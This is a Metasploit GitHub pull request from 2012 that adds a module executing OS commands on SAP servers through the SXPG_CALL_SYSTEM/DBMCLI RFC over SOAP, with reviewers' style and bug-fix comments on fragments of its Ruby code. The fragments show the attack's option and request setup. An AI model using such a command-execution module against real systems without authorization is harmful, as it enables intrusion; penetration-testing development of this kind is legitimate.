SAP SOAP RFC DBMCLI Command Injection (via SXPG_CALL_SYSTEM) #1030

Merged
merged 7 commits into from Nov 20, 2012

Conversation

Projects
None yet
3 participants
Contributor

nmonkee commented Nov 7, 2012

This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands via DBMCLI command as configured in SM69. See http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection for more information.

+ OptString.new('PASS', [true, 'Password', nil]),
+ OptString.new('CMD', [true, 'Command to be executed', nil]),
+ OptString.new('PARAM', [false, 'Additional parameters', nil]),
+ OptString.new('OS', [true, '1. ANYOS, 2. UNIX, 3. Windows NT, 4. AS/400, 5. OS/400', nil]),
@brandonprry

brandonprry Nov 11, 2012

Contributor

Trailing comma

@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

If OS commands can be executed maybe it can be converted into an exploit

@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

I think you should use OptEnum for the OS option

+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
@brandonprry

brandonprry Nov 11, 2012

Contributor

Trailing comma

+ 'Content-Type' => 'text/xml; charset=UTF-8',
+ }
+ }, 45)
+ if (res.code != 500 and res.code != 200)
@brandonprry

brandonprry Nov 11, 2012

Contributor

if res.code != 500 and res.code != 200

you are also not checking if res is null before evaluating res.code

+ 'Prefix' => "\n",
+ 'Postfix' => "\n",
+ 'Indent' => 1,
+ 'Columns' =>["Output",]
@brandonprry

brandonprry Nov 11, 2012

Contributor

Trailing comma in array?

+ response = res.body
+ if response =~ /faultstring/
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
@brandonprry

brandonprry Nov 11, 2012

Contributor

0.upto(output.length-1) do |i|

+ print_error("#{ip}:#{datastore['RPORT']} - Unable to connect")
+ return
+ end
+ if success == true
@brandonprry

brandonprry Nov 11, 2012

Contributor

if success

+ if success == true
+ print(saptbl.to_s)
+ end
+ if sucess == false
@brandonprry

brandonprry Nov 11, 2012

Contributor

typo

also, if not success

or

if !success

+ print(saptbl.to_s)
+ end
+ if sucess == false
+ for i in 0..error.length-1
@brandonprry

brandonprry Nov 11, 2012

Contributor

0.upto(error.length-1) do |i|

Contributor

jvazquez-r7 commented Nov 14, 2012

msftidy warning should be fixed

$ tools/msftidy.rb modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb 
sap_soap_rfc_sxpg_command_exec.rb:9 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:10 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:12 - [ERROR] Unicode detected: "# Mariano Nu\xC3\xB1ez (the author of the Bizploit framework) helped me in my efforts\n"
sap_soap_rfc_sxpg_command_exec.rb:14 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:15 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:48 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:135 - [WARNING] Spaces at EOL
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

A little more descriptive name pls

+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
+ 'Version' => '$Revision: $0.1',
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

version isn't needed anymore

+ 'Description' => %q{
+ This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

no general references pls

+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+ 'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
+ 'License' => BSD_LICENSE
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

Can MSF_LICENSE be used?

+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
+ 'Version' => '$Revision: $0.1',
+ 'Description' => %q{
+ This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

No more than 100 columsn per line in the description pls

+ # to do - implement error handlers for each status code, 404, 301, etc.
+ print_error("#{ip}:#{datastore['RPORT']} - something went wrong!")
+ return
+ else
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

sure res couldn't be nil here?

Contributor

jvazquez-r7 commented Nov 18, 2012

This pull request includes the file modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb, isn't the same as #1037 ?

Contributor

jvazquez-r7 commented Nov 18, 2012

ap haha sorry, can you just delete it (the wrong file) from this branch (sap_soap_rfc_dbmcli_sxpg_call_system_command_exec)?

Contributor

nmonkee commented Nov 18, 2012

done

jvazquez-r7 and others added some commits Nov 19, 2012

@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework Nov 20, 2012

Merged

up to date to test rapid7#1030 #3

Contributor

jvazquez-r7 commented Nov 20, 2012

Awesome! looks good, merging! thanks for updating the autor, sorry , my fault!

@jvazquez-r7 jvazquez-r7 merged commit e16a51f into rapid7:master Nov 20, 2012

1 check passed

default The Travis build passed
Details
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment